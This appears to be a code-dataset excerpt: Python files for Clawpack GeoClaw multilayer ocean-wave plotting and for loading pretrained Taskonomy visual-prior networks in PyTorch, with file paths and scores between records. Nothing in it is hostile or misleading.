plotitem.plot_var = 6
plotitem.plotstyle = 'b-'
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.axescmd = 'subplot(1, 2, 2)'
plotaxes.xlimits = [0.0, 1.0]
plotaxes.ylimits = internal_surface_limits
plotaxes.title = 'Bottom Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 7
plotitem.plotstyle = 'b-'
# =========================================================================
# Other plots
# Gauge Locations - Enable to see where gauges are located
def locations_afteraxes(current_data, gaugenos='all'):
gaugetools.plot_gauge_locations(current_data.plotdata,
gaugenos=gaugenos,
format_string='kx',
add_labels=True)
pcolor_afteraxes(current_data)
plotfigure = plotdata.new_plotfigure(name='Gauge Locations')
plotfigure.show = False
plotfigure.kwargs = {'figsize': (14, 4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = locations_afteraxes
ml_plot.add_surface_elevation(plotaxes, 1, bounds=top_surface_limits)
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1, 2, 2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = locations_afteraxes
ml_plot.add_surface_elevation(plotaxes, 2, bounds=internal_surface_limits)
ml_plot.add_land(plotaxes, 2)
# -----------------------------------------
# Parameters used only when creating html and/or latex hardcopy
# e.g., via pyclaw.plotters.frametools.printframes:
plotdata.printfigs = True # print figures
plotdata.print_format = 'png' # file format
plotdata.print_framenos = 'all' # list of frames to print
plotdata.print_fignos = 'all' # list of figures to print
plotdata.html = True # create html files of plots?
plotdata.latex = False # create latex file of plots?
plotdata.latex_figsperline = 2 # layout of plots
plotdata.latex_framesperline = 1 # layout of plots
plotdata.latex_makepdf = False # also run pdflatex?
plotdata.parallel = True # make multiple frame png's at once
return plotdata
|
examples/multi-layer/plane_wave/setplot.py
|
from __future__ import absolute_import
from __future__ import print_function
import os
import numpy as np
import matplotlib.pyplot as plt
from clawpack.visclaw import geoplot, gaugetools
import clawpack.clawutil.data as clawutil
import clawpack.amrclaw.data as amrclaw
import clawpack.geoclaw.data
import clawpack.geoclaw.multilayer.plot as ml_plot
def setplot(plotdata=None, bathy_location=0.15, bathy_angle=0.0,
bathy_left=-1.0, bathy_right=-0.2):
"""Setup the plotting data objects.
Input: plotdata, an instance of pyclaw.plotters.data.ClawPlotData.
Output: a modified version of plotdata.
returns plotdata object
"""
if plotdata is None:
from clawpack.visclaw.data import ClawPlotData
plotdata = ClawPlotData()
# Load data from output
clawdata = clawutil.ClawInputData(2)
clawdata.read(os.path.join(plotdata.outdir, 'claw.data'))
multilayer_data = clawpack.geoclaw.data.MultilayerData()
multilayer_data.read(os.path.join(plotdata.outdir, 'multilayer.data'))
def transform_c2p(x, y, x0, y0, theta):
return ((x+x0)*np.cos(theta) - (y+y0)*np.sin(theta),
(x+x0)*np.sin(theta) + (y+y0)*np.cos(theta))
def transform_p2c(x, y, x0, y0, theta):
return (x*np.cos(theta) + y*np.sin(theta) - x0,
-x*np.sin(theta) + y*np.cos(theta) - y0)
# Setup bathymetry reference lines
with open(os.path.join(plotdata.outdir, "bathy_geometry.data"), 'r') \
as bathy_geometry_file:
bathy_location = float(bathy_geometry_file.readline())
bathy_angle = float(bathy_geometry_file.readline())
x = [0.0, 0.0]
y = [0.0, 1.0]
x1, y1 = transform_c2p(x[0], y[0], bathy_location, 0.0, bathy_angle)
x2, y2 = transform_c2p(x[1], y[1], bathy_location, 0.0, bathy_angle)
if abs(x1 - x2) < 10**-3:
x = [x1, x1]
y = [clawdata.lower[1], clawdata.upper[1]]
else:
m = (y1 - y2) / (x1 - x2)
x[0] = (clawdata.lower[1] - y1) / m + x1
y[0] = clawdata.lower[1]
x[1] = (clawdata.upper[1] - y1) / m + x1
y[1] = clawdata.upper[1]
ref_lines = [((x[0], y[0]), (x[1], y[1]))]
plotdata.clearfigures()
plotdata.save_frames = False
# ========================================================================
# Generic helper functions
def pcolor_afteraxes(current_data):
bathy_ref_lines(current_data)
def contour_afteraxes(current_data):
axes = plt.gca()
pos = -80.0 * (23e3 / 180) + 500e3 - 5e3
axes.plot([pos, pos], [-300e3, 300e3], 'b',
[pos-5e3, pos-5e3], [-300e3, 300e3], 'y')
wind_contours(current_data)
bathy_ref_lines(current_data)
def profile_afteraxes(current_data):
pass
def bathy_ref_lines(current_data):
axes = plt.gca()
for ref_line in ref_lines:
x1 = ref_line[0][0]
y1 = ref_line[0][1]
x2 = ref_line[1][0]
y2 = ref_line[1][1]
axes.plot([x1, x2], [y1, y2], 'y--', linewidth=1)
# ========================================================================
# Axis limits
xlimits = [-0.5, 0.5]
ylimits = [-0.5, 0.5]
eta = [multilayer_data.eta[0], multilayer_data.eta[1]]
top_surface_limits = [eta[0] - 0.03, eta[0] + 0.03]
internal_surface_limits = [eta[1] - 0.015, eta[1] + 0.015]
top_speed_limits = [0.0, 0.1]
internal_speed_limits = [0.0, 0.03]
# ========================================================================
# Surface Elevations
plotfigure = plotdata.new_plotfigure(name='Surface')
plotfigure.show = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_surface_elevation(plotaxes,1,bounds=top_surface_limits)
# ml_plot.add_surface_elevation(plotaxes,1,bounds=[-0.06,0.06])
# ml_plot.add_surface_elevation(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
# ml_plot.add_surface_elevation(plotaxes,2,bounds=[-300-0.5,-300+0.5])
ml_plot.add_surface_elevation(plotaxes,2,bounds=internal_surface_limits)
# ml_plot.add_surface_elevation(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Depths
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='Depths', figno=42)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Layer Depth'
plotaxes.axescmd = 'subplot(1,2,1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_layer_depth(plotaxes,1,bounds=[-0.1,1.1])
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Bottom Layer Depth'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_layer_depth(plotaxes,2,bounds=[-0.1,0.7])
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Water Speed
plotfigure = plotdata.new_plotfigure(name='speed')
plotfigure.show = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Top layer speed
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Currents - Top Layer'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_speed(plotaxes, 1, bounds=top_speed_limits)
ml_plot.add_land(plotaxes, 1)
# Bottom layer speed
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Currents - Bottom Layer'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.afteraxes = pcolor_afteraxes
# add_speed(plotaxes,2,bounds=[0.0,1e-10])
ml_plot.add_speed(plotaxes,2,bounds=internal_speed_limits)
# add_speed(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# Individual components
plotfigure = plotdata.new_plotfigure(name='speed_components',figno=401)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,14)}
# Top layer
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "X-Velocity - Top Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,1)'
plotaxes.afteraxes = pcolor_afteraxes
# add_x_velocity(plotaxes,1,bounds=[-1e-10,1e-10])
ml_plot.add_x_velocity(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "Y-Velocity - Top Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,2)'
plotaxes.afteraxes = pcolor_afteraxes
# add_y_velocity(plotaxes,1,bounds=[-0.000125,0.000125])
ml_plot.add_y_velocity(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
# Bottom layer
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "X-Velocity - Bottom Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,3)'
plotaxes.afteraxes = pcolor_afteraxes
# add_x_velocity(plotaxes,2,bounds=[-1e-10,1e-10])
ml_plot.add_x_velocity(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "Y-Velocity - Bottom Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,4)'
plotaxes.afteraxes = pcolor_afteraxes
# add_y_velocity(plotaxes,2,bounds=[-0.8e-6,.8e-6])
ml_plot.add_y_velocity(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Profile Plots
# Note that these are not currently plotted by default - set
# `plotfigure.show = True` is you want this to be plotted
plotfigure = plotdata.new_plotfigure(name='profile')
plotfigure.show = False
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.xlimits = xlimits
plotaxes.ylimits = [-1.1, 0.1]
plotaxes.title = "Profile of depth"
plotaxes.afteraxes = profile_afteraxes
slice_index = 30
# Internal surface
def bathy_profile(current_data):
return current_data.x[:, slice_index], b(current_data)[:, slice_index]
def lower_surface(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
eta2(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
eta2(current_data)[slice_index, :]
def upper_surface(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
eta1(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
eta1(current_data)[slice_index, :]
def top_speed(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
water_u1(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
water_u1(current_data)[slice_index, :]
def bottom_speed(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
water_u2(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
water_u2(current_data)[slice_index, :]
# Bathy
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = bathy_profile
plotitem.plot_var = 0
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = 'k'
plotitem.show = True
# Internal Interface
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = lower_surface
plotitem.plot_var = 7
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = 'b'
plotitem.show = True
# Upper Interface
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = upper_surface
plotitem.plot_var = 6
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = (0.2, 0.8, 1.0)
plotitem.show = True
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Y-Velocity'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
# Water
# plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')
# # plotitem.plot_var = geoplot.surface
# plotitem.plot_var = water_v
# plotitem.pcolor_cmap = colormaps.make_colormap({1.0:'r',0.5:'w',0.0:'b'})
# # plotitem.pcolor_cmin = -1.e-10
# # plotitem.pcolor_cmax = 1.e-10
# # plotitem.pcolor_cmin = -2.5 # -3.0
# # plotitem.pcolor_cmax = 2.5 # 3.0
# plotitem.add_colorbar = True
# plotitem.amr_celledges_show = [0,0,0]
# plotitem.amr_patchedges_show = [1,1,1]
# Land
ml_plot.add_land(plotaxes, 1)
# ========================================================================
# Contour plot for surface
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='contour_surface',figno=15)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Set up for axes in this figure:
# Top Surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1,2,1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
ml_plot.add_surface_elevation(plotaxes,plot_type='contour',surface=1,bounds=[-2.5,-1.5,-0.5,0.5,1.5,2.5])
ml_plot.add_land(plotaxes, 1, plot_type='contour')
# Internal Surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
ml_plot.add_surface_elevation(plotaxes,plot_type='contour',surface=2,bounds=[-2.5,-1.5,-0.5,0.5,1.5,2.5])
ml_plot.add_land(plotaxes, 2, plot_type='contour')
# ========================================================================
# Contour plot for speed
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='contour_speed',figno=16)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Current'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
# Surface
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.plot_var = ml_plot.water_speed_depth_ave
plotitem.kwargs = {'linewidths':1}
# plotitem.contour_levels = [1.0,2.0,3.0,4.0,5.0,6.0]
plotitem.contour_levels = [0.5,1.5,3,4.5,6.0]
plotitem.amr_contour_show = [1,1,1]
plotitem.amr_celledges_show = [0,0,0]
plotitem.amr_patchedges_show = [1,1,1]
plotitem.amr_contour_colors = 'k'
# plotitem.amr_contour_colors = ['r','k','b'] # color on each level
# plotitem.amr_grid_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.show = True
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.plot_var = geoplot.land
plotitem.contour_nlevels = 40
plotitem.contour_min = 0.0
plotitem.contour_max = 100.0
plotitem.amr_contour_colors = ['g'] # color on each level
plotitem.amr_patch_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.amr_celledges_show = 0
plotitem.amr_patchedges_show = 0
plotitem.show = True
# ========================================================================
# Grid Cells
# ========================================================================
# Figure for grid cells
plotfigure = plotdata.new_plotfigure(name='cells', figno=2)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.title = 'Grid patches'
plotaxes.scaled = True
# Set up for item on these axes:
plotitem = plotaxes.new_plotitem(plot_type='2d_patch')
plotitem.amr_patch_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.amr_celledges_show = [0,0,0]
plotitem.amr_patchedges_show = [1,1,1]
# ========================================================================
# Vorticity Plot
# ========================================================================
# plotfigure = plotdata.new_plotfigure(name='vorticity',figno=17)
# plotfigure.show = False
# plotaxes = plotfigure.new_plotaxes()
# plotaxes.title = "Vorticity"
# plotaxes.scaled = True
# plotaxes.xlimits = xlimits
# plotaxes.ylimits = ylimits
# plotaxes.afteraxes = pcolor_afteraxes
#
# # Vorticity
# plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = 9
# plotitem.imshow_cmap = plt.get_cmap('PRGn')
# # plotitem.pcolor_cmap = plt.get_cmap('PuBu')
# # plotitem.pcolor_cmin = 0.0
# # plotitem.pcolor_cmax = 6.0
# plotitem.imshow_cmin = -1.e-2
# plotitem.imshow_cmax = 1.e-2
# plotitem.add_colorbar = True
# plotitem.amr_celledges_show = [0,0,0]
# plotitem.amr_patchedges_show = [1]
#
# # Land
# plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')
# plotitem.plot_var = geoplot.land
# plotitem.pcolor_cmap = geoplot.land_colors
# plotitem.pcolor_cmin = 0.0
# plotitem.pcolor_cmax = 80.0
# plotitem.add_colorbar = False
# plotitem.amr_celledges_show = [0,0,0]
# ========================================================================
# Figures for gauges
# Top
plotfigure = plotdata.new_plotfigure(name='Surface & topo',
type='each_gauge',
figno=301)
plotfigure.show = True
plotfigure.clf_each_gauge = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.xlimits = [0.0, 1.0]
plotaxes.ylimits = top_surface_limits
plotaxes.title = 'Top Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 6
plotitem.plotstyle = 'b-'
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.axescmd = 'subplot(1, 2, 2)'
plotaxes.xlimits = [0.0, 1.0]
plotaxes.ylimits = internal_surface_limits
plotaxes.title = 'Bottom Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 7
plotitem.plotstyle = 'b-'
# =========================================================================
# Other plots
# Gauge Locations - Enable to see where gauges are located
def locations_afteraxes(current_data, gaugenos='all'):
gaugetools.plot_gauge_locations(current_data.plotdata,
gaugenos=gaugenos,
format_string='kx',
add_labels=True)
pcolor_afteraxes(current_data)
plotfigure = plotdata.new_plotfigure(name='Gauge Locations')
plotfigure.show = False
plotfigure.kwargs = {'figsize': (14, 4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = locations_afteraxes
ml_plot.add_surface_elevation(plotaxes, 1, bounds=top_surface_limits)
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1, 2, 2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = locations_afteraxes
ml_plot.add_surface_elevation(plotaxes, 2, bounds=internal_surface_limits)
ml_plot.add_land(plotaxes, 2)
# -----------------------------------------
# Parameters used only when creating html and/or latex hardcopy
# e.g., via pyclaw.plotters.frametools.printframes:
plotdata.printfigs = True # print figures
plotdata.print_format = 'png' # file format
plotdata.print_framenos = 'all' # list of frames to print
plotdata.print_fignos = 'all' # list of figures to print
plotdata.html = True # create html files of plots?
plotdata.latex = False # create latex file of plots?
plotdata.latex_figsperline = 2 # layout of plots
plotdata.latex_framesperline = 1 # layout of plots
plotdata.latex_makepdf = False # also run pdflatex?
plotdata.parallel = True # make multiple frame png's at once
return plotdata
| 0.765506 | 0.521654 |
from .taskonomy_network import TaskonomyEncoder, TaskonomyDecoder, TaskonomyNetwork, TASKONOMY_PRETRAINED_URLS, TASKS_TO_CHANNELS
import multiprocessing.dummy as mp
import torch
default_device = 'cuda' if torch.cuda.is_available() else 'cpu'
def representation_transform(img, feature_task='normal', device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_representation(img, feature_tasks=[feature_task], device=device)
def multi_representation_transform(img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a features driven by some vision tasks
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_representation(img, feature_tasks, device)
def max_coverage_featureset_transform(img, k=4, device=default_device):
'''
Transforms an RGB image into a features driven by some vision tasks.
The tasks are chosen according to the Max-Coverage Min-Distance Featureset
From the paper:
Mid-Level Visual Representations Improve Generalization and Sample Efficiency
for Learning Visuomotor Policies.
<NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>.
Arxiv preprint 2018.
This function expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8*k, 16, 16)
'''
return VisualPrior.max_coverage_transform(img, k, device)
def feature_readout(img, feature_task='normal', device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task,
then returns the result of a readout of the feature.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_predicted_label(img, feature_tasks=[feature_task], device=device)
def multi_feature_readout(img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a features driven by some vision tasks
then returns the readouts of the features.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_predicted_label(img, feature_tasks, device)
def get_networks(feature_tasks, train=False, decoder=False, device=torch.device('cpu')):
'''
Return taskonomy encoder (and decoder) (with or) without gradients.
Expects inputs:
feature_tasks list
train bool
decoder bool
device torch.device
Outputs:
list(nn.Module)
'''
return VisualPrior.get_nets(feature_tasks, train, decoder, device)
def get_viable_feature_tasks():
'''
Return viable feature tasks as list of strings.
Outputs:
list(str)
'''
return VisualPrior.viable_feature_tasks
def get_max_coverate_featuresets():
'''
Return max coverate featuresets as list of list of strings.
Outputs:
list(list(str))
'''
return VisualPrior.max_coverate_featuresets
class VisualPrior(object):
max_coverate_featuresets = [
['autoencoding'],
['segment_unsup2d', 'segment_unsup25d'],
['edge_texture', 'reshading', 'curvature'],
['normal', 'keypoints2d', 'segment_unsup2d', 'segment_semantic'],
]
model_dir = None
viable_feature_tasks = [
'autoencoding',
'colorization',
'curvature',
'denoising',
'edge_texture',
'edge_occlusion',
'egomotion',
'fixated_pose',
'jigsaw',
'keypoints2d',
'keypoints3d',
'nonfixated_pose',
'point_matching',
'reshading',
'depth_zbuffer',
'depth_euclidean',
'normal',
'room_layout',
'segment_unsup25d',
'segment_unsup2d',
'segment_semantic',
'class_object',
'class_scene',
'inpainting',
'vanishing_point']
@classmethod
def to_representation(cls, img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task(s)
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
This funciton is technically unsupported and there are absolutely no guarantees.
'''
VisualPriorRepresentation._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorRepresentation.feature_task_to_net[t] = VisualPriorRepresentation.feature_task_to_net[t].to(device)
nets = [VisualPriorRepresentation.feature_task_to_net[t] for t in feature_tasks]
with torch.no_grad():
return torch.cat([net(img) for net in nets], dim=1)
@classmethod
def to_predicted_label(cls, img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a predicted label for some task.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, C, 256, 256)
values [-1,1]
This funciton is technically unsupported and there are absolutely no guarantees.
'''
VisualPriorPredictedLabel._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorPredictedLabel.feature_task_to_net[t] = VisualPriorPredictedLabel.feature_task_to_net[t].to(device)
nets = [VisualPriorPredictedLabel.feature_task_to_net[t] for t in feature_tasks]
with torch.no_grad():
return torch.cat([net(img) for net in nets], dim=1)
@classmethod
def max_coverage_transform(cls, img, k=4, device=default_device):
assert k > 0, 'Number of features to use for the max_coverage_transform must be > 0'
if k > 4:
raise NotImplementedError("max_coverage_transform featureset not implemented for k > 4")
return cls.to_representation(img, feature_tasks=cls.max_coverate_featuresets[k - 1], device=device)
@classmethod
def set_model_dir(cls, model_dir):
cls.model_dir = model_dir
@classmethod
def get_nets(cls, feature_tasks, train, decoder, device):
if decoder:
if len(feature_tasks) == 1:
VisualPriorPredictedLabel._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorPredictedLabel.feature_task_to_net[t] = VisualPriorPredictedLabel.feature_task_to_net[t].to(device)
nets = [VisualPriorPredictedLabel.feature_task_to_net[t] for t in feature_tasks]
else:
raise NotImplementedError("Decoder retrieval only implemented for single feature task.")
else:
VisualPriorRepresentation._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorRepresentation.feature_task_to_net[t] = VisualPriorRepresentation.feature_task_to_net[t].to(device)
nets = [VisualPriorRepresentation.feature_task_to_net[t] for t in feature_tasks]
if train:
for net in nets:
# method override in taskonomy_network.py -> TaskonomyNetwork
net.train(False)
for p in net.parameters():
p.requires_grad = True
return nets
class VisualPriorRepresentation(object):
'''
Handles loading networks that transform images into encoded features.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
feature_task_to_net = {}
@classmethod
def _load_unloaded_nets(cls, feature_tasks, model_dir=None):
net_paths_to_load = []
feature_tasks_to_load = []
for feature_task in feature_tasks:
if feature_task not in cls.feature_task_to_net:
net_paths_to_load.append(TASKONOMY_PRETRAINED_URLS[feature_task + '_encoder'])
feature_tasks_to_load.append(feature_task)
nets = cls._load_networks(net_paths_to_load)
for feature_task, net in zip(feature_tasks_to_load, nets):
cls.feature_task_to_net[feature_task] = net
@classmethod
def _load_networks(cls, network_paths, model_dir=None):
return [cls._load_encoder(url, model_dir) for url in network_paths]
@classmethod
def _load_encoder(cls, url, model_dir=None, progress=True):
net = TaskonomyEncoder() #.cuda()
net.eval()
checkpoint = torch.utils.model_zoo.load_url(url, model_dir=model_dir, progress=progress)
net.load_state_dict(checkpoint['state_dict'])
for p in net.parameters():
p.requires_grad = False
# net = Compose(nn.GroupNorm(32, 32, affine=False), net)
return net
class VisualPriorPredictedLabel(object):
'''
Handles loading networks that transform images into transformed images.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, C, 256, 256)
values [-1,1]
This class is technically unsupported and there are absolutely no guarantees.
'''
feature_task_to_net = {}
@classmethod
def _load_unloaded_nets(cls, feature_tasks, model_dir=None):
net_paths_to_load = []
feature_tasks_to_load = []
for feature_task in feature_tasks:
if feature_task not in cls.feature_task_to_net:
if feature_task not in TASKS_TO_CHANNELS:
raise NotImplementedError('Task {} not implemented in VisualPriorPredictedLabel'.format(feature_task))
net_paths_to_load.append((TASKS_TO_CHANNELS[feature_task],
TASKONOMY_PRETRAINED_URLS[feature_task + '_encoder'],
TASKONOMY_PRETRAINED_URLS[feature_task + '_decoder']))
feature_tasks_to_load.append(feature_task)
nets = cls._load_networks(net_paths_to_load)
for feature_task, net in zip(feature_tasks_to_load, nets):
cls.feature_task_to_net[feature_task] = net
@classmethod
def _load_networks(cls, network_paths, model_dir=None, progress=True):
nets = []
for out_channels, encoder_path, decoder_path in network_paths:
nets.append(TaskonomyNetwork(
out_channels=out_channels,
load_encoder_path=encoder_path,
load_decoder_path=decoder_path,
model_dir=model_dir,
progress=progress))
return nets
|
visualpriors/transforms.py
|
from .taskonomy_network import TaskonomyEncoder, TaskonomyDecoder, TaskonomyNetwork, TASKONOMY_PRETRAINED_URLS, TASKS_TO_CHANNELS
import multiprocessing.dummy as mp
import torch
default_device = 'cuda' if torch.cuda.is_available() else 'cpu'
def representation_transform(img, feature_task='normal', device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_representation(img, feature_tasks=[feature_task], device=device)
def multi_representation_transform(img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a features driven by some vision tasks
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_representation(img, feature_tasks, device)
def max_coverage_featureset_transform(img, k=4, device=default_device):
'''
Transforms an RGB image into a features driven by some vision tasks.
The tasks are chosen according to the Max-Coverage Min-Distance Featureset
From the paper:
Mid-Level Visual Representations Improve Generalization and Sample Efficiency
for Learning Visuomotor Policies.
<NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>.
Arxiv preprint 2018.
This function expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8*k, 16, 16)
'''
